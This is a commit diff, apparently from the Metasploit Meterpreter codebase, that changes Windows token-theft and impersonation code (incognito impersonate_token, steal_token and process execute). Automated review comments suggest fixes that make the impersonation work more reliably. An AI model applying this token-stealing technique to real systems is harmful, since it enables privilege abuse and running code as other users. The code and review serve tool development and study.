
This *should* fix all cases where execute -t would fail to use an impersonated token

git-svn-id: file:///home/svn/framework3/trunk@9754 4d416f70-5f16-0410-b530-b9f4589650da
HD Moore 2010-07-09 19:32:51 +00:00
parent 7c45fd988e
commit 4ccc02d329
4 changed files with 15 additions and 7 deletions

@ -150,7 +150,7 @@ DWORD request_incognito_impersonate_token(Remote *remote, Packet *packet)
strncat(return_value, token_list[i].username, sizeof(return_value)-strlen(return_value)-1);
strncat(return_value, "\n", sizeof(return_value)-strlen(return_value)-1);
if (!DuplicateToken(token_list[i].token, SecurityImpersonation, &xtoken)) {
if (!DuplicateTokenEx(token_list[i].token, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &xtoken)) {
dprintf("[INCOGNITO] Failed to duplicate token for %s (%u)", token_list[i].username, GetLastError());
} else {
core_update_thread_token(remote, xtoken);
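Review bot: The new DuplicateTokenEx call produces a TokenPrimary handle that the next line hands to core_update_thread_token; if that helper ends up applying it with SetThreadToken, a primary token is rejected (SetThreadToken accepts only impersonation tokens), whereas ImpersonateLoggedOnUser accepts either kind, so the helper's mechanism is worth confirming — its body is outside this hunk. The hunk also leaves xtoken's ownership implicit; if the helper takes the handle, a comment on the call such as `// ownership of xtoken passes to core_update_thread_token` would spare the next reader a trip into core. request_incognito_impersonate_token starts and ends outside the hunk.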

@ -231,9 +231,10 @@ DWORD request_sys_config_steal_token(Remote *remote, Packet *packet)
break;
}
if(! DuplicateToken(token, SecurityImpersonation, &xtoken)) {
if(! DuplicateTokenEx(token, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, &xtoken)) {
res = GetLastError();
dprintf("[STEAL-TOKEN] Failed to duplicate token for %d (%u)", pid, res);
dprintf("[STEAL-TOKEN] Failed to duplicate a primary token for %d (%u)", pid, res);
break;
}
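Review bot: The new DuplicateTokenEx call asks for SecurityIdentification, while the otherwise parallel call added to the incognito extension in the same commit asks for SecurityImpersonation; an identification-level token only allows querying the user's identity, not acting as that user, so if this xtoken is later used to impersonate or to spawn a process the level would have to be SecurityImpersonation. Whether the level is honoured at all for a TokenPrimary duplicate is not visible here, but aligning the two calls removes the question: `if(! DuplicateTokenEx(token, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &xtoken)) {`. Capturing GetLastError into res before the dprintf is correct and should stay. request_sys_config_steal_token starts and ends outside the hunk.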

@ -256,16 +256,21 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
{
// If there is an impersonated token stored, use that one first, otherwise
// try to grab the current thread token, then the process token
if (remote->hThreadToken)
if (remote->hThreadToken){
token = remote->hThreadToken;
dprintf("[execute] using thread impersonation token");
}
else if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &token))
OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &token);
dprintf("[execute] token is 0x%.8x", token);
// Duplicate to make primary token (try delegation first)
if (!DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL, SecurityDelegation, TokenPrimary, &pToken))
if (!DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &pToken))
{
result = GetLastError();
dprintf("[execute] failed to duplicate token 0x%.8x", result);
break;
}
@ -275,6 +280,7 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
lpfnDestroyEnvironmentBlock = (LPFNDESTROYENVIRONMENTBLOCK) GetProcAddress( hUserEnvLib, "DestroyEnvironmentBlock" );
if (lpfnCreateEnvironmentBlock && lpfnCreateEnvironmentBlock( &pEnvironment, pToken, FALSE)) {
createFlags |= CREATE_UNICODE_ENVIRONMENT;
dprintf("[execute] created a duplicated environment block");
} else {
pEnvironment = NULL;
}
@ -284,6 +290,7 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
if (!CreateProcessAsUser(pToken, NULL, commandLine, NULL, NULL, inherit, createFlags, pEnvironment, NULL, &si, &pi))
{
result = GetLastError();
dprintf("[execute] failed to create the new process 0x%.8x", result);
break;
}
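Review bot: In the first hunk of this file the new `else if` discards the result of OpenProcessToken, so when neither OpenThreadToken nor OpenProcessToken succeeds `token` is never assigned and an indeterminate handle is passed to DuplicateTokenEx a few lines later; the fallback should be checked and reported like the other failure paths in the function. The `dprintf("[execute] token is 0x%.8x", token)` line formats a HANDLE with `%x`, which truncates and is undefined on a 64-bit build — `%p` with a `(void *)` cast is the portable spelling. Both OpenThreadToken and OpenProcessToken request TOKEN_ALL_ACCESS although DuplicateTokenEx only needs TOKEN_DUPLICATE (plus TOKEN_QUERY for the environment-block call), so a narrower mask would follow least privilege; and since the thread-token branch aliases remote->hThreadToken into `token`, any CloseHandle on `token` further down would close the stored token, which cannot be verified from the hunk. request_sys_process_execute continues outside the hunk.
```c
    // … unchanged: remote->hThreadToken branch …
    else if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &token) &&
             !OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &token))
    {
        // Neither token could be opened; stop here rather than hand an
        // indeterminate handle to DuplicateTokenEx below.
        result = GetLastError();
        dprintf("[execute] failed to open a token 0x%.8x", result);
        break;
    }
    dprintf("[execute] token is %p", (void *)token);
    // … unchanged: DuplicateTokenEx / CreateProcessAsUser …
```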